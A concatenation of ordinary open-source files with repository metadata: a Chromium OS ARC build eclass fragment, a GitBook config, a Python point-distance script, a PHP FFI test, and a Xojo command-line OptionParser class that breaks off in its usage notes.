recognize certain # recent microarchitectures like tremont. Filter it out for now. # TODO(b/161353194) If clang is uprevved, please remove this # filter and see if the build succeeds. filter-flags -march=tremont # multilib.eclass does not use CFLAGS_${DEFAULT_ABI}, but # we need to add some flags valid only for amd64, so we trick # it to think that neither x86 nor amd64 is the default. export DEFAULT_ABI=none export CHOST=x86_64-linux-android export CHOST_amd64=x86_64-linux-android export CHOST_x86=i686-linux-android CFLAGS_amd64="${CFLAGS_amd64} -I${ARC_SYSROOT}/usr/include/arch-x86_64/include/" CFLAGS_x86="${CFLAGS_x86} -I${ARC_SYSROOT}/usr/include/arch-x86/include/" export CFLAGS_amd64="${CFLAGS_amd64} -target ${CHOST_amd64} --gcc-toolchain=${ARC_GCC_BASE}" export CFLAGS_x86="${CFLAGS_x86} -target ${CHOST_x86} --gcc-toolchain=${ARC_GCC_BASE}" # Add Android related utilities location to ${PATH}. export PATH="${ARC_GCC_BASE}/bin:${PATH}" ;; esac # Make sure we use the 64-bit strip/objcopy that can handle both 32-bit # and 64-bit binaries. STRIP="$(tc-getSTRIP ${CHOST})" export STRIP OBJCOPY="$(tc-getOBJCOPY ${CHOST})" export OBJCOPY # Some linkers (namely ARM64's bfd linker) do no have this flag set by # default. append-ldflags -Wl,--allow-shlib-undefined # Strip out flags that are specific to our compiler wrapper. filter-flags -clang-syntax # Some linkers (such as ARM64's bfd linker) doesn't recognize or link # correctly with this flag, filter it out. filter-flags -Wl,--icf=all # Set up flags for the android sysroot. append-flags --sysroot="${ARC_SYSROOT}" append-cppflags --sysroot="${ARC_SYSROOT}" local android_version=$(printf "0x%04x" \ $(((ARC_VERSION_MAJOR << 8) + ARC_VERSION_MINOR))) append-cppflags -DANDROID -DANDROID_VERSION=${android_version} # By default Chrome OS build system adds the CFLAGS/CXXFLAGS as below: # -fno-exceptions -fno-unwind-tables -fno-asynchronous-unwind-table # They prevent Android from showing the backtrace. # By calling 'cros_enable_cxx_exceptions' we can filter out these flags. # Call it here to make sure that any Android packages are compiled this way. cros_enable_cxx_exceptions # Select clang compiler ARC_LLVM_BASE="${ARC_BASE}/arc-llvm/${ARC_LLVM_VERSION}" export CC="${ARC_LLVM_BASE}/bin/clang" export CXX="${ARC_LLVM_BASE}/bin/clang++" # Allow unused arguments since ARC often uses flags from Chrome OS but # with older clang. append-cflags -Qunused-arguments -Wno-unknown-warning-option append-cxxflags -Qunused-arguments -Wno-unknown-warning-option if (( ${ARC_VERSION_MAJOR} == 9 )); then # TODO(crbug.com/922335): Remove "-stdlib=libc++" after bug resolved. export CXX="${CXX} -stdlib=libc++" append-cxxflags -stdlib=libc++ else append-cxxflags -nostdinc++ -I${ARC_SYSROOT}/usr/include/c++/4.9 fi } # Copied from the upstream meson.eclass. The upstream cross-file does not # set needs_exe_wrapper, and I don't see how to automatically detect that # for upstream. arc-build-create-cross-file() { # Reference: http://mesonbuild.com/Cross-compilation.html # system roughly corresponds to uname -s (lowercase) local system=unknown case ${CHOST} in *-aix*) system=aix ;; *-cygwin*) system=cygwin ;; *-darwin*) system=darwin ;; *-freebsd*) system=freebsd ;; *-linux*) system=linux ;; mingw*|*-mingw*) system=windows ;; *-solaris*) system=sunos ;; esac local cpu_family=$(tc-arch) case ${cpu_family} in amd64) cpu_family=x86_64 ;; arm64) cpu_family=aarch64 ;; esac # This may require adjustment based on CFLAGS local cpu=${CHOST%%-*} ARC_CROSS_FILE="${T}/arc-meson.${CHOST}.${ABI}" cat > "${ARC_CROSS_FILE}" <<-EOF [binaries] ar = $(_meson_env_array "$(tc-getAR)") c = $(_meson_env_array "$(tc-getCC)") cpp = $(_meson_env_array "$(tc-getCXX)") fortran = $(_meson_env_array "$(tc-getFC)") llvm-config = '$(tc-getPROG LLVM_CONFIG llvm-config)' objc = $(_meson_env_array "$(tc-getPROG OBJC cc)") objcpp = $(_meson_env_array "$(tc-getPROG OBJCXX c++)") pkgconfig = '$(tc-getPKG_CONFIG)' strip = $(_meson_env_array "$(tc-getSTRIP)") [properties] c_args = $(_meson_env_array "${CFLAGS} ${CPPFLAGS}") c_link_args = $(_meson_env_array "${CFLAGS} ${LDFLAGS}") cpp_args = $(_meson_env_array "${CXXFLAGS} ${CPPFLAGS}") cpp_link_args = $(_meson_env_array "${CXXFLAGS} ${LDFLAGS}") fortran_args = $(_meson_env_array "${FCFLAGS}") fortran_link_args = $(_meson_env_array "${FCFLAGS} ${LDFLAGS}") objc_args = $(_meson_env_array "${OBJCFLAGS} ${CPPFLAGS}") objc_link_args = $(_meson_env_array "${OBJCFLAGS} ${LDFLAGS}") objcpp_args = $(_meson_env_array "${OBJCXXFLAGS} ${CPPFLAGS}") objcpp_link_args = $(_meson_env_array "${OBJCXXFLAGS} ${LDFLAGS}") needs_exe_wrapper = true [host_machine] system = '${system}' cpu_family = '${cpu_family}' cpu = '${cpu}' endian = '$(tc-endian)' EOF } fi
Gentoo Eclass
5
FydeOS/chromium_os_for_raspberry_pi
project-cros-pi/eclass/arc-build.eclass
[ "BSD-2-Clause" ]
root: ./docs structure: readme: Introduction.md summary: Summary.md
YAML
1
BetaAI/slate
.gitbook.yaml
[ "MIT" ]
"""Uses Pythagoras theorem to calculate the distance between two points in space.""" import math class Point: def __init__(self, x, y, z): self.x = x self.y = y self.z = z def __repr__(self) -> str: return f"Point({self.x}, {self.y}, {self.z})" def distance(a: Point, b: Point) -> float: return math.sqrt(abs((b.x - a.x) ** 2 + (b.y - a.y) ** 2 + (b.z - a.z) ** 2)) def test_distance() -> None: """ >>> point1 = Point(2, -1, 7) >>> point2 = Point(1, -3, 5) >>> print(f"Distance from {point1} to {point2} is {distance(point1, point2)}") Distance from Point(2, -1, 7) to Point(1, -3, 5) is 3.0 """ pass if __name__ == "__main__": import doctest doctest.testmod()
Python
5
JB1959/Python
maths/pythagoras.py
[ "MIT" ]
--TEST-- Bug #78543 (is_callable() on FFI\CData throws Exception) --EXTENSIONS-- ffi --FILE-- <?php $ffi = FFI::cdef(' struct test { int dummy; }; '); $test = $ffi->new('struct test'); var_dump(is_callable($test)); ?> --EXPECT-- bool(false)
PHP
4
NathanFreeman/php-src
ext/ffi/tests/bug78543.phpt
[ "PHP-3.01" ]
#tag Class Protected Class OptionParser #tag Method, Flags = &h0 Sub AddOption(o As Option) // Add an option to the parser. // // ### Parameters // * `o` - `Option` to add // // ### Exceptions // // `OptionParserException` can be thrown if one attempts to add an option with the same // short or long key as an existing option. // Validation If o.ShortKey <> "" And Dict.HasKey(o.ShortKey.Asc) Then Raise New OptionParserException("You can't add the same short key more than once: " + o.ShortKey) End If If o.LongKey <> "" And Dict.HasKey(o.LongKey) Then Raise New OptionParserException("You can't add the same long key more than once: " + o.LongKey) End If If o.ShortKey = "?" Then Raise New OptionParserException("You can't add the key ""?"" This means ""help"" and has already been added for you") End If Options.Append o If o.ShortKey <> "" Then Dict.Value(o.ShortKey.Asc) = o End If If o.LongKey <> "" Then Dict.Value(o.LongKey) = o End If End Sub #tag EndMethod #tag Method, Flags = &h0 Function Arguments() As String() // Get the original arguments passed to the `OptionParser` as // a `String` array. Return CopyStringArray(OriginalArgs) End Function #tag EndMethod #tag Method, Flags = &h0 Function ArrayValue(key As Variant) As Variant() // // Retrieve the contents of an option as a `Variant` array. The contents // of the array are of course a `Variant` however the actual value assigned to the // `Variant` is that of the options `OptionType`. For example, if this option is // of the `OptionType.Integer` value, then the resulting array will be an array // containing parsed `Integer` values from the command line. The same is true for // any of the `OptionType` values. // // ### Parameters // // * `key` - Key of the option to retrieve. This can be the short or long key. Convention // is to use the long key if available as it produces more readable code. // // ### Notes // // The option needs to have the `IsArray` property set to `True` to utilize this method. // Dim v() As Variant Dim o As Option = OptionValue(key) If Not (o Is Nil) Then v = o.Value End If Return v End Function #tag EndMethod #tag Method, Flags = &h0 Function BooleanValue(key As Variant, defaultValue As Boolean = False) As Boolean // // Retrieve the contents of an option as a `Boolean` value. // // ### Parameters // // * `key` - Key of the option to retrieve. This can be the short or long key. Convention // is to use the long key if available as it produces more readable code. // * `defaultValue` - Value to return if the user did not supply this option. // // ### Notes // // The option type must be that of `OptionType.Boolean`. // Dim o As Option = OptionValue(key) Return If(o Is Nil Or o.WasSet = False, defaultValue, o.Value.BooleanValue) End Function #tag EndMethod #tag Method, Flags = &h0, CompatibilityFlags = (TargetHasGUI) Shared Function CommandLineArgs() As String() // Return an array of command-line arguments const kDebugDeclares = false dim args() as string #if DebugBuild and not kDebugDeclares then // // Not perfect, but will emulate what you'll get in the built app // args = ParseStringValue(System.CommandLine) #elseif TargetMacOS then const kCocoaLib = "Cocoa.framework" declare function NSClassFromString lib kCocoaLib (aClassName as CFStringRef) as Ptr declare function defaultCenter lib kCocoaLib selector "processInfo" (class_id as Ptr) as Ptr declare function arguments lib kCocoaLib selector "arguments" (obj_id as Ptr) as Ptr declare function m_count lib kCocoaLib selector "count" (obj as Ptr) as UInteger declare function objectAtIndex lib kCocoaLib selector "objectAtIndex:" (theArray as Ptr, idx as Integer) as CFStringRef static c as Ptr = defaultCenter(NSClassFromString("NSProcessInfo")) dim nsArrayRef as Ptr = arguments(c) dim ub as integer = m_count(nsArrayRef) - 1 for i as integer = 0 to ub dim s as string = objectAtIndex(nsArrayRef, i) args.Append s next #elseif TargetWin32 then // // Windows and Linux code from Thomas Tempelmann // declare function GetCommandLineW lib "kernel32.dll" () as Ptr declare function CommandLineToArgvW lib "shell32.dll" (lpCmdLine As Ptr, ByRef pNumArgs As Integer) As Ptr declare sub LocalFree Lib "kernel32.dll" (p as Ptr) dim cl as Ptr = GetCommandLineW() dim n as Integer dim argList as Ptr = CommandLineToArgvW (cl, n) for idx as Integer = 0 to n-1 dim mb as MemoryBlock = argList.Ptr(idx*4) // mb points to a UTF16 0-terminated string. It seems we have to scan its length ourselves now. dim len as Integer while mb.UInt16Value(len) <> 0 len = len + 2 wend dim s as String = mb.StringValue(0,len).DefineEncoding(Encodings.UTF16) s = s.ConvertEncoding(Encodings.UTF8) args.Append s next LocalFree(argList) #elseif TargetLinux then // read from "/proc/self/cmdline", each item is 0-terminated const SystemLib = "libc.so" declare function open lib SystemLib (path as CString, flags as Integer) As Integer declare function read lib SystemLib (fd as Integer, data as Ptr, n as Integer) as Integer // first, read the entire cmdline into a string dim fd as Integer = open ("/proc/self/cmdline", 0) dim s as String do dim mb as new MemoryBlock(1000) dim n as Integer = read (fd, mb, mb.Size) s = s + mb.StringValue (0, n) if n < mb.Size then exit loop args = s.Split(Chr(0)) call args.Pop // remove last array item because of extra 00 byte at end of string for i as integer = 0 to args.Ubound dim thisArg as string = args(i) if Encodings.UTF8.IsValidData(thisArg) then args(i) = thisArg.DefineEncoding(Encodings.UTF8) else args(i) = thisArg.DefineEncoding(Encodings.ISOLatin1) end if next #endif return args End Function #tag EndMethod #tag Method, Flags = &h0 Sub Constructor(appName As String = "", appDescription As String = "") // // Construct a new `OptionParser` // // ### Parameters // // * `appName` - Name of the application to display when showing help. // * `appDescription` - Description of the application to display when showing help. // // For more inforation on the parameters, see the two properties `AppName` and `AppDescription`. // // ### Notes // // When creating a new `OptionParser` the "Help" option is added automatically. The "Help" // option uses the short key `h` and the long key `help`, thus they can not be used by // the application. // Dict = New Dictionary Self.AppName = If(appName = "", App.ExecutableFile.Name, appName) Self.AppDescription = appDescription Dim helpOption As New Option("h", "help", "Show help", Option.OptionType.Boolean) AddOption helpOption End Sub #tag EndMethod #tag Method, Flags = &h21 Private Function CopyStringArray(arr() As String) As String() Dim result() As String If arr.Ubound = -1 Then Return result ReDim result(arr.Ubound) For i As Integer = 0 to arr.Ubound result(i) = arr(i) Next i Return result End Function #tag EndMethod #tag Method, Flags = &h0 Function DateValue(key As Variant, defaultValue As Date = Nil) As Date // // Retrieve the contents of an option as a `Date` value. // // ### Parameters // // * `key` - Key of the option to retrieve. This can be the short or long key. Convention // is to use the long key if available as it produces more readable code. // * `defaultValue` - Value to return if the user did not supply this option. // // ### Notes // // The option type must be that of `OptionType.Date`. // // **WARNING**: // If the `Option.IsValidDateRequired` is set to `True` then the value supplied must // pass the test of `ParseDate()`. If, however, `Option.IsValidDateRequired` is // set to `False` and `ParseDate()` can not handle the date properly, the value is // recorded as a `String` not a `Date`. // // This behavior is likely to change in the future. If one requests the type be a // valid date, then the value will have to pass as a valid date or a `OptionInvalidKeyValueException` // will be raised to indicate that an invalid option value has been supplied. // Dim v As Variant = Value(key) Return If(v Is Nil, defaultValue, v.DateValue) End Function #tag EndMethod #tag Method, Flags = &h0 Function DoubleValue(key As Variant, defaultValue As Double = 0.0) As Double // // Retrieve the contents of an option as a `Double` value. // // ### Parameters // // * `key` - Key of the option to retrieve. This can be the short or long key. Convention // is to use the long key if available as it produces more readable code. // * `defaultValue` - Value to return if the user did not supply this option. // // ### Notes // // The option type must be that of `OptionType.Double`. // Dim v As Variant = Value(key) Return If(v Is Nil, defaultValue, v.DoubleValue) End Function #tag EndMethod #tag Method, Flags = &h21 Private Function ExpandArgs(args() As String) As String() // Takes arguments that may be chained and expands them Dim expandedArgs() As String For argIndex As Integer = 0 To args.Ubound Dim arg As String = args(argIndex) If arg = "--" Then // Start of our "forced" extras For i As Integer = argIndex To args.Ubound expandedArgs.Append args(i) Next Exit For argIndex ElseIf arg.Left(2) = "--" Then expandedArgs.Append arg ElseIf arg.Left(1) = "-" And arg.Len > 2 Then arg = arg.Mid(2) // Chop off the hyphen Dim value As String Dim equalIndex As Integer = arg.InStr(2, "=") // If they started the switch with "=", that doesn't count If equalIndex <> 0 Then value = arg.Mid(equalIndex) arg = arg.Left(equalIndex - 1) End if Dim switches() As String = arg.Split("") Dim lastIndex As Integer = switches.Ubound - 1 For i As Integer = 0 To lastIndex expandedArgs.Append "-" + switches(i) Next i expandedArgs.Append "-" + switches(switches.Ubound) + value Else // Append as-is expandedArgs.Append arg End If Next argIndex Return expandedArgs End Function #tag EndMethod #tag Method, Flags = &h0 Function FileValue(key As Variant, defaultValue As FolderItem = Nil) As FolderItem // // Retrieve the contents of an option as a `FolderItem` value. // // ### Parameters // // * `key` - Key of the option to retrieve. This can be the short or long key. Convention // is to use the long key if available as it produces more readable code. // * `defaultValue` - Value to return if the user did not supply this option. // // ### Notes // // The option type must be that of `OptionType.File` or `OptionType.Folder`. // // **WARNING**: // This will likely be renamed to `FolderItemValue` in the future. // Dim v As Variant = Value(key) Return If(v Is Nil, defaultValue, FolderItem(v)) End Function #tag EndMethod #tag Method, Flags = &h0 Shared Function GetRelativeFolderItem(path As String, relativeTo As FolderItem = Nil) As FolderItem Dim prefix As String = "" #If TargetWin32 Then Const pathSep = "\" // // Maybe what is passed isn't actually a relative path // If path.Mid(2, 1) = ":" Then Return GetFolderItem(path, FolderItem.PathTypeShell) End If If path.Left(1) = pathSep Then relativeTo = GetFolderItem(SpecialFolder.CurrentWorkingDirectory.NativePath.Left(3)) End If #Else Const pathSep = "/" // // Resolve home // if path.Left(2) = "~/" then path = SpecialFolder.UserHome.NativePath + path.Mid(2) end if // // Maybe what is passed isn't actually a relative path // If path.Left(1) = pathSep Then Return GetFolderItem(path, FolderItem.PathTypeShell) End If prefix = pathSep #EndIf // // OK, seems to be a relative path // If relativeTo = Nil Then relativeTo = SpecialFolder.CurrentWorkingDirectory End If path = relativeTo.NativePath + pathSep + path Dim newParts() As String Dim pathParts() As String = path.Split(pathSep) For i As Integer = 0 to pathParts.Ubound Dim p As String = pathParts(i) If p = "" Then // Can happen on Windows since it appends a pathSep onto the end of NativePath // if relativeTo is a folder. ElseIf p = "." Then // Skip this path component ElseIf p = ".." Then // Remove the last path component from newParts If newParts.Ubound > -1 Then newParts.Remove newParts.Ubound End If Else // Nothing special about this path component newParts.Append p End If Next path = prefix + Join(newParts, pathSep) Return GetFolderItem(path, FolderItem.PathTypeShell) End Function #tag EndMethod #tag Method, Flags = &h0 Function IntegerValue(key As Variant, defaultValue As Integer = 0) As Integer // // Retrieve the contents of an option as a `Integer` value. // // ### Parameters // // * `key` - Key of the option to retrieve. This can be the short or long key. Convention // is to use the long key if available as it produces more readable code. // * `defaultValue` - Value to return if the user did not supply this option. // // ### Notes // // The option type must be that of `OptionType.Integer`. // Dim v As Variant = Value(key) Return If(v Is Nil, defaultValue, v.IntegerValue) End Function #tag EndMethod #tag Method, Flags = &h21, CompatibilityFlags = (TargetHasGUI) Private Shared Function IsQuoteCharacter(char As String) As Boolean #if TargetWin32 then return (char = """") #else return (char = """" or char = "'") #endif End Function #tag EndMethod #tag Method, Flags = &h21 Private Function KeyWithDashes(key As String) As String // Takes a key and converts it back to its single or double-dash version key = key.Trim If key = "" Then Return "" ElseIf key.Left(1) = "-" Then // Already there Return key ElseIf key.Len = 1 Then Return "-" + key Else Return "--" + key End If End Function #tag EndMethod #tag Method, Flags = &h0 Function OptionValue(key As String) As Option // // Retrieve the actual `Option` object associated with the `key`. // // ### Parameters // // * `key` - Key of the option to retrieve. This can be the short or long key. Convention // is to use the long key if available as it produces more readable code. // // ### Notes // // Once `Parse` has been called, changing parameters in the `Option` object will // have no bearing or change. // // One can use this to check the `WasSet` property of the `Option` class. // Dim lookupKey As Variant = key If Not Dict.HasKey(lookupKey) Then If key.Len = 1 Then lookupKey = key.Asc End If End If Return Dict.Lookup(lookupKey, Nil) End Function #tag EndMethod #tag Method, Flags = &h21 Private Function PadRight(s as String, width as Integer, padding as String = " ") As String // Pad a string to at least 'width' characters, by adding padding characters // to the right side of the string. dim length as Integer length = len(s) if length >= width then return s dim mostToRepeat as Integer mostToRepeat = ceil((width-length)/len(padding)) return s + mid(Repeat(padding, mostToRepeat),1,width-length) End Function #tag EndMethod #tag Method, Flags = &h0 Sub Parse(args() As String, firstArgIsExecutable As Boolean = True) // // Parse the arguments // // ### Parameters // // * `args()` - Command line arguments already split into an array. Generally this will be used // with a `ConsoleApplication` since it's `Run` event passes in command line parameters this way. // // ### Exceptions // // * `OptionUnrecognizedKeyException` can be raised in the event an invalid argument is supplied. // For example, the user types `myprog --coun=12` when it should have been `--count=12`. // * `OptionInvalidKeyValueException` can be raised in the event a valid argument is supplied with // an invalid value. For example `--count=John` where `count` was suppose to be an `Integer`. // * `OptionParserException` can be raised in the event that the application expects at least X // extra items but the user did not supply at least X extra items. // OriginalArgs = CopyStringArray(args) args = ExpandArgs(args) Dim restAreExtras As Boolean Dim optIdx As Integer = -1 While optIdx < args.Ubound // args can be rewritten in the loop optIdx = optIdx + 1 // // If the first argument is the executable, // we simply ignore it // if optIdx = 0 and firstArgIsExecutable then continue while end if If restAreExtras Then Extra.Append args(optIdx) Continue End If Dim arg As String = args(optIdx) If arg = "" Then Continue End If If arg = "--" Then restAreExtras = True Continue End If Dim key As String Dim value As String // Special case: // -? is a synonym for help If arg.Left(2) = "-?" Then arg = "-h" + arg.Mid(3) End If If arg.Left(2) = "--" Then key = arg.Mid(3) ElseIf arg.Left(1) = "-" Then key = arg.Mid(2) Else If arg <> "" Then Extra.Append arg End If Continue End If Dim equalIdx As Integer = key.InStr(2, "=") // Start at the second character dim hasEquals as boolean If equalIdx <> 0 Then hasEquals = true value = key.Mid(equalIdx + 1) key = key.Left(equalIdx - 1) End If Dim opt As Option = OptionValue(key) If opt = Nil Then // // Maybe the user has specified --no-option which should set a // boolean value to False // If key.Left(3) <> "no-" Then RaiseUnrecognizedKeyException(key) End If key = key.Mid(4) opt = OptionValue(key) If opt = Nil Or opt.Type <> Option.OptionType.Boolean Then RaiseUnrecognizedKeyException(key) Else value = "No" End If End If If value <> "" or hasEquals Then // We already got the value, ignore everything else in this If ElseIf opt.Type = Option.OptionType.Boolean Then value = "Yes" ElseIf Not Self.HelpRequested Then // This requires a parameter and the parameter value was not // given as an = assignment, thus it must be the next argument // But if help was requested, it doesn't matter, so we skip this. // If a value was given next, it will just be added to Extras. If optIdx = args.Ubound Then RaiseInvalidKeyValueException(key, kMissingKeyValue) End If optIdx = optIdx + 1 value = args(optIdx) End If opt.HandleValue(value) Wend // // Validate Parsed Values // but only if help wasn't requested. // If it was, all bets are off and up to the caller to validate. // If Not Self.HelpRequested Then If ExtrasRequired > 0 And Extra.Ubound < (ExtrasRequired - 1) Then Raise New OptionParserException("Insufficient extras specified") End If For Each o As Option In Options If Not o.IsValid Then Dim key As String If o.LongKey <> "" Then key = o.LongKey Else key = o.ShortKey End If If o.IsRequired And o.Value = Nil Then RaiseMissingKeyException(key) Else RaiseInvalidKeyValueException(key, kInvalidKeyValue + " '" + o.Value.StringValue + "'") End If End If Next End If End Sub #tag EndMethod #tag Method, Flags = &h21, CompatibilityFlags = (TargetHasGUI) Private Shared Sub ParseRestOfString(value As String, appendTo() As String) value = value.Trim if value = "" then return end if if value.Encoding = nil then #if TargetMacOS then value = value.DefineEncoding(Encodings.MacRoman) #else value = value.DefineEncoding(Encodings.ISOLatin1) #endif end if value = value.ConvertEncoding( Encodings.UTF8 ) dim allChars() as string = value.Split("") dim thisChunk() as string dim inQuote as boolean dim quoteChar as string dim charIndex as integer while charIndex <= allChars.Ubound dim thisChar as string = allChars(charIndex) if thisChar = "\" and charIndex < allChars.Ubound then thisChunk.Append allChars(charIndex + 1) charIndex = charIndex + 1 elseif inQuote and thisChar = quoteChar then inQuote = false elseif inQuote then thisChunk.Append thisChar elseif IsQuoteCharacter(thisChar) then inQuote = true quoteChar = thisChar elseif thisChar = " " then if thisChunk.Ubound <> -1 then appendTo.Append join(thisChunk, "") redim thisChunk(-1) end if else // Just a character thisChunk.Append thisChar end if charIndex = charIndex + 1 wend if thisChunk.Ubound <> -1 then appendTo.Append join(thisChunk, "") end if End Sub #tag EndMethod #tag Method, Flags = &h21, CompatibilityFlags = (TargetHasGUI) Private Shared Function ParseStringValue(value As String) As String() // // Parse the arguments into a `String` array of parameters, then pass the contents of that // array to the 'real' `Parse(args() As String)` method. // // ### Parameters // // * `value` - Command line arguments contained in a single line string. This is // used in a Desktop via a call to `System.CommandLine` as a Desktop // has no direct access to the `args()` parameter that a `ConsoleApplication` // does. // // ### Notes // // See `Parse(args() As String)` for more detailed information // Dim matches() As String Dim rx As New RegEx '#if TargetWin32 then ' '// Code from Michel Bujardet (https://forum.xojo.com/14420-system-commandline) ' 'rx.SearchPattern = "(""[^""]+""|[^\s""]+)" ' 'Dim match As RegExMatch = rx.Search(value) ' 'While match <> Nil 'matches.Append ReplaceAll(match.SubExpressionString(1), chr(34), "") 'match = rx.Search() 'Wend ' '#else // TargetDesktop // // We have to peel off of the executable first // dim rest as string dim myPath as string = App.ExecutableFile.NativePath dim pattern as string = """?(\Q" + myPath.ReplaceAllB( "\E", "\\EE\Q" ) + "\E)""? (.*)" rx.SearchPattern = pattern dim match as RegExMatch = rx.Search(value) if match IsA RegExMatch then matches.Append match.SubExpressionString(1) rest = match.SubExpressionString(2) ParseRestOfString(rest, matches) else matches.Append value end if '#endif return(matches) End Function #tag EndMethod #tag Method, Flags = &h21 Private Sub RaiseInvalidKeyValueException(key As String, type As String) Raise New OptionInvalidKeyValueException("Invalid key value: " + KeyWithDashes(key) + " (" + type + ")") End Sub #tag EndMethod #tag Method, Flags = &h21 Private Sub RaiseMissingKeyException(key As String) Raise New OptionMissingKeyException("Missing option: " + KeyWithDashes(key)) End Sub #tag EndMethod #tag Method, Flags = &h21 Private Sub RaiseUnrecognizedKeyException(key As String) Raise New OptionUnrecognizedKeyException("Unrecognized key: " + KeyWithDashes(key)) End Sub #tag EndMethod #tag Method, Flags = &h21 Private Function Repeat(s as String, repeatCount as Integer) As String // Concatenate a string to itself 'repeatCount' times. // Example: Repeat("spam ", 5) = "spam spam spam spam spam ". #pragma disablebackgroundTasks if repeatCount <= 0 then return "" if repeatCount = 1 then return s // Implementation note: normally, you don't want to use string concatenation // for something like this, since that creates a new string on each operation. // But in this case, we can double the size of the string on iteration, which // quickly reduces the overhead of concatenation to insignificance. This method // is faster than any other we've found (short of declares, which were only // about 2X faster and were quite platform-specific). Dim desiredLenB As Integer = LenB(s) * repeatCount dim output as String = s dim cutoff as Integer = (desiredLenB+1)\2 dim curLenB as Integer = LenB(output) while curLenB < cutoff output = output + output curLenB = curLenB + curLenB wend output = output + LeftB(output, desiredLenB - curLenB) return output End Function #tag EndMethod #tag Method, Flags = &h0 Sub ShowHelp(sectionTitle As String = "Help") // // Display a nicely formatted help message including various pieces of meta // data such as `AppName`, `AppDescription` and `AdditionalHelpNotes`. Mixed // in there are of course all of the possible options with their short and long // keys, value types (if any) and description // // // ### Parameters // * `sectionTitle` - One can overide the section title in case they have multiple // help screen outputs or have utilized more than one `OptionParser` for some // advanced techniques. // // ### Notes // // Right now there is not a nice GUI for displaying the command line help for // a GUI application or a Web application. // // * For a console application, the output is `Print` to the screen. // * For a GUI application, the output is given to `MsgBox` // * For a Web application, help is not currently displayed. // // **WARNING**: It is likely that for console applications the call to `Print` // will changes to `StdErr.Write` instead. // Const kAlignCol = 20 Const kLineLength = 72 Static descIndent As String = kIndentPrefix + Repeat(" ", kAlignCol + 1) Dim helpLines() As String Dim helpFor As String = AppName If helpFor <> "" Then If AppDescription <> "" Then helpFor = kIndentPrefix + helpFor + " - " + AppDescription End If helpLines.Append helpFor helpLines.Append "" End If helpLines.Append sectionTitle + ":" For i As Integer = 0 To Options.Ubound Dim opt As Option = Options(i) Dim keys() As String If opt.ShortKey <> "" Then Dim keyString As String = KeyWithDashes(opt.ShortKey) If opt.Type <> Option.OptionType.Boolean Then keyString = keyString + " " + opt.TypeString End If keys.Append keyString End If If opt.LongKey <> "" Then Dim keyString As String = KeyWithDashes(opt.LongKey) If opt.Type <> Option.OptionType.Boolean Then keyString = keyString + "=" + opt.TypeString End If keys.Append keyString End If Dim key As String = Join(keys, ", ") dim desc as string = opt.HelpDescription If key.Len > kAlignCol Or desc.InStr(EndOfLine) <> 0 Then helpLines.Append kIndentPrefix + key helpLines.Append WrapTextWithIndent(desc, kLineLength, descIndent) ElseIf (key.Len + desc.Len) > kLineLength Then key = kIndentPrefix + PadRight(key, kAlignCol + 1) desc = WrapTextWithIndent(desc, kLineLength, descIndent) desc = desc.Mid(key.Len + 1) helpLines.Append key + desc Else helpLines.Append kIndentPrefix + PadRight(key, kAlignCol + 1) + desc End If Next Dim notes As String = AdditionalHelpNotes.Trim If notes <> "" Then notes = WrapTextWithIndent(notes, kLineLength) helpLines.Append "" helpLines.Append "Notes:" helpLines.Append notes helpLines.Append "" End If Dim help As String = Join(helpLines, EndOfLine) #If TargetConsole Then Print help #ElseIf TargetDesktop Then MsgBox help #Else #Pragma Warning "How to print help?" #EndIf End Sub #tag EndMethod #tag Method, Flags = &h0 Function StringValue(key As Variant, defaultValue As String = "") As String // // Retrieve the contents of an option as a `String` value. // // ### Parameters // // * `key` - Key of the option to retrieve. This can be the short or long key. Convention // is to use the long key if available as it produces more readable code. // * `defaultValue` - Value to return if the user did not supply this option. // // ### Notes // // The option type must be that of `OptionType.String`. // Dim o As Option = OptionValue(key) Return If(o Is Nil Or o.WasSet = False Or o.Value Is Nil, defaultValue, o.Value.StringValue) End Function #tag EndMethod #tag Method, Flags = &h21 Private Function Value(key As Variant) As Variant Dim vk As String = key Dim v As Variant = Dict.Lookup(vk, Nil) If v = Nil Then v = Dict.Lookup(vk.Asc, Nil) End If If v <> Nil Then Return Option(v).Value End If Return Nil End Function #tag EndMethod #tag Method, Flags = &h21 Private Sub WrapLines(lines() As String, charsPerLine As Integer = 72, paragraphFill As Boolean = true) // Wrap the text so that no line is longer than charsPerLine. If paragraphFill // is true, then whenever one long line is followed by a line that does not // start with whitespace, join them together into one continuous paragraph. // Copied from StringUtils. If UBound(lines) < 0 Then Return // Start by joining lines, if called for. If paragraphFill Then Dim lineNum As Integer = 1 Dim lastLineShort As Boolean = (lines(0).Len < charsPerLine - 20) While lineNum <= UBound(lines) Dim line As String = lines(lineNum) Dim firstChar As String = Left(line, 1) If lastLineShort Then // last line was short, so don't join this one to it lineNum = lineNum + 1 elseif line = "" or firstChar <= " " or firstChar = ">" or firstChar = "|" Then // this line is empty or starts with whitespace or other special char; don't join it lineNum = lineNum + 1 Else // this line starts with a character; join it to the previous line lines(lineNum - 1) = lines(lineNum - 1) + " " + line lines.Remove lineNum End If lastLineShort = (line.Len < charsPerLine - 20) Wend End If // Then, go through and do the wrapping. For lineNum As Integer = 0 To UBound(lines) Dim line As String = RTrim(lines(lineNum)) If line.Len <= charsPerLine Then lines(lineNum) = line Else Dim breakPos As Integer For breakPos = charsPerLine DownTo 1 Dim c As String = Mid(line, breakPos, 1) If c <= " " or c = "-" Then Exit Next If breakPos < 2 Then breakPos = charsPerLine + 1 // no point breaking before char 1 lines.Insert lineNum + 1, LTrim(Mid(line, breakPos)) lines(lineNum) = LTrim(Left(line, breakPos - 1)) End If Next End Sub #tag EndMethod #tag Method, Flags = &h21 Private Sub WrapLinesWithIndent(lines() As String, charsPerLine As Integer, indent As String = kIndentPrefix) WrapLines(lines, charsPerLine - indent.Len, False) For i As Integer = 0 To lines.Ubound lines(i) = indent + lines(i) Next i End Sub #tag EndMethod #tag Method, Flags = &h21 Private Function WrapTextWithIndent(text As String, charsPerLine As Integer, indent As String = kIndentPrefix) As String text = ReplaceLineEndings(text, EndOfLine) Dim lines() As String = Split(text, EndOfLine) WrapLinesWithIndent(lines, charsPerLine, indent) Return Join(lines, EndOfLine) End Function #tag EndMethod #tag Note, Name = How to supply command line parameters `OptionParser` is versitle on it's use of command line options. * Options can appear anywhere on the command line * Extra can be at the start, middle or end of the command line * Short options can be combined * Long options with assignment utilize the equal sign (`=`) * Short options can optionally use the `=` sign * File and Directory options can be a full or relative path * Anything after a `--` is considered an extra even if it looks like a parameter * Boolean options can be prefixed with no, --recursive or --no-recursive, it'll just do the right thing. Here are some example uses at the command line: ``` # Options for a fictitious copy program # # -r/--recursive # -v/--verbose # -l/--log FILE # copy the 